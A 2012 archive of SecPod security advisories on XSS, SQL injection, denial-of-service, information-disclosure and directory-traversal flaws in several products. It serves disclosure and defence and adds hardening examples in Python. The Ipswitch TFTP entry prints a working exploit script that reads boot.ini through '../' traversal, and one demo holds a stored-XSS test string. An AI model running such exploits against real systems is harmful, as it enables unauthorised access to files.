ArticleSetup Multiple Persistent Cross-Site Scripting and SQL Injection Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found multiple persistent Cross-Site Scripting and SQL Injection vulnerabilities in ArticleSetup. The vulnerabilities are caused by improper validation of various parameters in multiple pages. They may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Mar 30th, 2012 | Filed under Advisories

JAMWiki ‘num’ Parameter Cross-Site Scripting Vulnerability

SecPod Research Team member (Sooraj K.S) has found a Cross-Site Scripting vulnerability in JAMWiki. The vulnerability is caused by improper validation of the “num” parameter in the “Special:AllPages” page. It may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Mar 30th, 2012 | Filed under Advisories

Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Denial of Service vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused by improper validation of overly long HTTP requests sent to the web server, which allows remote attackers to crash the service.

PoC: Download here.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Feb 28th, 2012 | Filed under Advisories, Research

Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found an Information Disclosure vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused by improper validation of a malicious HTTP GET request for the Traffic Grapher Server’s ‘default.nd’ that carries an invalid HTTP version number followed by multiple ‘CRLF’ sequences; the server responds by disclosing the source code of ‘default.nd’.

PoC: Download here.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found an Information Disclosure vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused by improper validation of an HTTP request to the Dashboard server with a ‘?’ character appended, which discloses the physical path of the Dashboard server’s web script.

PoC: Download here.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Feb 28th, 2012 | Filed under Advisories, Research
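The three NetDecision reports above describe the same defensive gap from three angles: an over-long request, an invalid HTTP version token followed by extra CRLFs, and a request target with a bare ‘?’ appended all reached the server’s handlers without being validated first. The Python below is an added example, not code from SecPod or Netmechanica, showing the request-line checks a small HTTP front end should apply before dispatching to any script or file handler. The 4096-byte limit, the regular expression and the sample request lines are constructed for this demonstration.

```python
import re

# Constructed limit for the demo; a real server takes this from its configuration.
MAX_REQUEST_LINE = 4096
# Only "HTTP/d.d" is a valid version token; anything else is rejected up front.
HTTP_VERSION_RE = re.compile(r"^HTTP/[0-9]\.[0-9]$")


def parse_request_line(raw):
    """Parse a raw HTTP request line (bytes) into (method, path, query, version).

    Raises ValueError for anything that must be rejected before a handler sees it:
    an over-long line, non-ASCII bytes, stray CR/LF, a malformed version token,
    or a request target that is not an absolute path.
    """
    if len(raw) > MAX_REQUEST_LINE:
        raise ValueError("request line too long (%d bytes)" % len(raw))
    if raw.endswith(b"\r\n"):
        raw = raw[:-2]                       # strip the one terminator we expect
    try:
        line = raw.decode("ascii")
    except UnicodeDecodeError:
        raise ValueError("non-ASCII byte in request line")
    if "\r" in line or "\n" in line:
        raise ValueError("stray CR/LF inside request line")
    parts = line.split(" ")
    if len(parts) != 3 or not all(parts):
        raise ValueError("request line is not 'METHOD SP target SP version'")
    method, target, version = parts
    if not HTTP_VERSION_RE.match(version):
        raise ValueError("malformed HTTP version token %r" % version)
    if not target.startswith("/"):
        raise ValueError("request target must be an absolute path")
    # A bare trailing '?' yields an empty query string. Callers must treat that
    # exactly like a request with no query, never as a different resource name.
    path, _, query = target.partition("?")
    return method, path, query, version


def check_request_line(raw):
    """Return (True, parsed) or (False, reason) so a server can log what it rejected."""
    try:
        return True, parse_request_line(raw)
    except ValueError as exc:
        return False, str(exc)


# Constructed sample request lines modelled on the three reports above.
SAMPLES = [
    b"GET /default.nd HTTP/1.1\r\n",              # well-formed
    b"GET /default.nd HTTP/1.x\r\n",              # bad version token
    b"GET /default.nd HTTP/1.1\r\n\r\n\r\n",      # extra CRLFs glued onto the line
    b"GET /dashboard.nd? HTTP/1.0\r\n",           # trailing '?' with empty query
    b"GET /" + b"A" * 8000 + b" HTTP/1.1\r\n",    # over-long request line
]

if __name__ == "__main__":
    for sample in SAMPLES:
        ok, result = check_request_line(sample)
        print("ACCEPT" if ok else "REJECT", result)
```

The point of `check_request_line` returning a reason string rather than raising is operational: a front end that logs the rejection reason gives the SOC a clean signal for the malformed-request probing these advisories describe, without the request ever reaching the component that used to crash or leak.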

OfficeSIP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Denial of Service vulnerability in OfficeSIP Server. The vulnerability is caused by improper validation of the SIP/SIPS URI in the ‘To’ header of a request. The flaw can be exploited to crash the service.

PoC: Download here.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Feb 1st, 2012 | Filed under Advisories, Exploits, Research

NetSarang Xlpd Printer Daemon Denial of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Denial of Service vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused by improper validation of malicious LPD requests sent to the printer daemon. The flaw can be exploited to crash the service.

PoC: Download here.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Feb 1st, 2012 | Filed under Advisories, Exploits

Sphinix Mobile Web Server Multiple Persistent XSS Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found multiple persistent Cross-Site Scripting vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerabilities are caused by improper validation of the “comment” parameter in the “/Blog/MyFirstBlog.txt” and “/Blog/AboutSomething.txt” pages. They may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Feb 1st, 2012 | Filed under Advisories, Research

Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found multiple persistent Cross-Site Scripting vulnerabilities in Apache Struts. The vulnerabilities are caused by improper validation of various parameters in multiple pages. They may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Feb 1st, 2012 | Filed under Advisories, Research
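The ArticleSetup, JAMWiki, Sphinix and Apache Struts reports above all come down to request parameters that are stored or echoed into HTML without encoding, and in ArticleSetup’s case also spliced into SQL. As an added example that is not code from any of those projects or from SecPod, the Python below models a blog comment feature of the kind the Sphinix report describes: the page name and comment body travel as bound query parameters, and the body is HTML-encoded at render time. The table schema, the in-memory SQLite database and the sample comments are constructed for this demonstration; `fetch_comments_unsafe` is kept only as the ‘before’ pattern the hardened functions replace.

```python
import html
import sqlite3


def make_demo_db():
    """In-memory comment table standing in for the blog's database (constructed for this demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, page TEXT NOT NULL, body TEXT NOT NULL)")
    return conn


def store_comment(conn, page, body):
    """Persist a comment. Both values are bound parameters, never spliced into the SQL text."""
    conn.execute("INSERT INTO comments (page, body) VALUES (?, ?)", (page, body))
    conn.commit()


def fetch_comments_unsafe(conn, page):
    """The 'before' pattern: the page name is formatted into the statement.

    A page name containing a single quote breaks the query (shown below); input chosen
    by an attacker can instead change what the query means. Do not use this form."""
    return [row[0] for row in conn.execute(
        "SELECT body FROM comments WHERE page = '%s' ORDER BY id" % page)]


def fetch_comments(conn, page):
    """Hardened lookup: the page name is a bound parameter, so quotes are just data."""
    return [row[0] for row in conn.execute(
        "SELECT body FROM comments WHERE page = ? ORDER BY id", (page,))]


def render_comments(conn, page):
    """Render stored comments as an HTML list.

    Encoding happens at output time, so a stored '<script>' tag is displayed as text
    instead of being parsed by the browser. quote=True also covers attribute contexts."""
    items = "".join("<li>%s</li>" % html.escape(body, quote=True)
                    for body in fetch_comments(conn, page))
    return "<ul>%s</ul>" % items


def compare_lookups(conn, page):
    """Run both lookups for one page name and report what each did."""
    result = {"safe": fetch_comments(conn, page)}
    try:
        result["unsafe"] = fetch_comments_unsafe(conn, page)
    except sqlite3.OperationalError as exc:
        result["unsafe"] = "query broke: %s" % exc
    return result


if __name__ == "__main__":
    db = make_demo_db()
    store_comment(db, "MyFirstBlog.txt", "Nice post!")
    store_comment(db, "MyFirstBlog.txt", "<script>alert(1)</script>")   # constructed stored-XSS test string
    store_comment(db, "O'Reilly", "a page name with a quote in it")
    print(render_comments(db, "MyFirstBlog.txt"))
    print(compare_lookups(db, "O'Reilly"))
```

Two design points are worth calling out. Encoding belongs at the output boundary, not at storage time: the raw comment is kept intact so it can be rendered safely into other contexts later, and every render path goes through one escaping call. And the parameterised query handles the quote in `O'Reilly` correctly where the formatted one fails, which is the everyday symptom of the same defect the ArticleSetup SQL injection report describes.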

Ipswitch TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused by improper validation of ‘Read’ requests containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal.

PoC: Download here.

More information on the flaws can be found here.

#!/usr/bin/env python3
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP data to a particular host on a specified port
    and returns the response.
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(5)                           ## Do not block forever if the daemon stays silent
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print('\tUsage: python exploit.py target_ip')
        print('\tExample : python exploit.py 127.0.0.1')
        print('\tExiting...')
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = b"\x00\x01"                               ## TFTP Read Request (RRQ opcode)
    data += b"../" * 10 + b"boot.ini" + b"\x00"      ## Read boot.ini file using directory traversal
    data += b"netascii\x00"                          ## TFTP transfer mode

    ## Send the request and print whatever the daemon returns
    rec_data = sendPacket(HOST, PORT, data)
    print("Data Found on the target : %s " % (HOST))
    print(rec_data.decode("latin-1").strip())
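
For comparison with the PoC above, here is the server-side check that stops this class of request, written as an added example in Python 3 (not Ipswitch’s code and not part of SecPod’s advisory or PoC). It parses the RFC 1350 read request exactly as the daemon must, then resolves the requested filename against the served directory and refuses anything whose canonical path lands outside it, instead of scanning the string for ‘../’. The served root /srv/tftp and the request filenames are constructed for this demonstration.

```python
import os

TFTP_RRQ = 1
TFTP_WRQ = 2
TFTP_MODES = ("netascii", "octet", "mail")


def build_request(opcode, filename, mode="octet"):
    """Encode an RFC 1350 read/write request: 2-byte opcode, filename, NUL, mode, NUL."""
    return (opcode.to_bytes(2, "big")
            + filename.encode("ascii") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def parse_request(packet):
    """Decode an RRQ/WRQ into (opcode, filename, mode); raise ValueError if malformed."""
    if len(packet) < 4:
        raise ValueError("packet too short for a TFTP request")
    opcode = int.from_bytes(packet[:2], "big")
    if opcode not in (TFTP_RRQ, TFTP_WRQ):
        raise ValueError("opcode %d is not a read or write request" % opcode)
    fields = packet[2:].split(b"\x00")
    # A well-formed request yields [filename, mode, b""]; the trailing b"" is the
    # final NUL terminator, so fewer than three fields means a truncated packet.
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("filename or mode is not NUL-terminated")
    filename = fields[0].decode("ascii")       # UnicodeDecodeError is a ValueError
    mode = fields[1].decode("ascii").lower()
    if not filename:
        raise ValueError("empty filename")
    if mode not in TFTP_MODES:
        raise ValueError("unknown transfer mode %r" % mode)
    return opcode, filename, mode


def confine_to_root(root, filename):
    """Map a requested filename onto the served directory, rejecting any escape.

    Both '/' and '\\' count as separators because Windows daemons accept either.
    The check compares the *resolved* candidate against the canonical root, so
    '../' sequences, absolute paths and mixed separators are all caught the same way.
    """
    root = os.path.realpath(root)
    relative = filename.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError("request for %r escapes the TFTP root" % filename)
    return candidate


def handle_request(root, packet):
    """Server-side entry point: returns ('ok', absolute_path) or ('error', reason)."""
    try:
        _opcode, filename, _mode = parse_request(packet)
        return "ok", confine_to_root(root, filename)
    except (ValueError, PermissionError) as exc:
        return "error", str(exc)


if __name__ == "__main__":
    ROOT = "/srv/tftp"                                   # constructed served directory
    samples = [
        build_request(TFTP_RRQ, "../" * 10 + "boot.ini", "netascii"),   # the PoC's request
        build_request(TFTP_RRQ, "..\\..\\boot.ini"),                    # backslash variant
        build_request(TFTP_RRQ, "firmware/image.bin"),                  # legitimate read
        b"\x00\x05oops",                                                # not a request at all
    ]
    for pkt in samples:
        print(handle_request(ROOT, pkt))
```

The reason to resolve and compare paths rather than reject the literal string ‘../’ is that the daemon’s own later normalisation (backslashes, URL-style encodings, repeated separators) can reintroduce a traversal that a string filter missed; checking the final path against the root closes the whole class rather than the one spelling the PoC uses.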

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team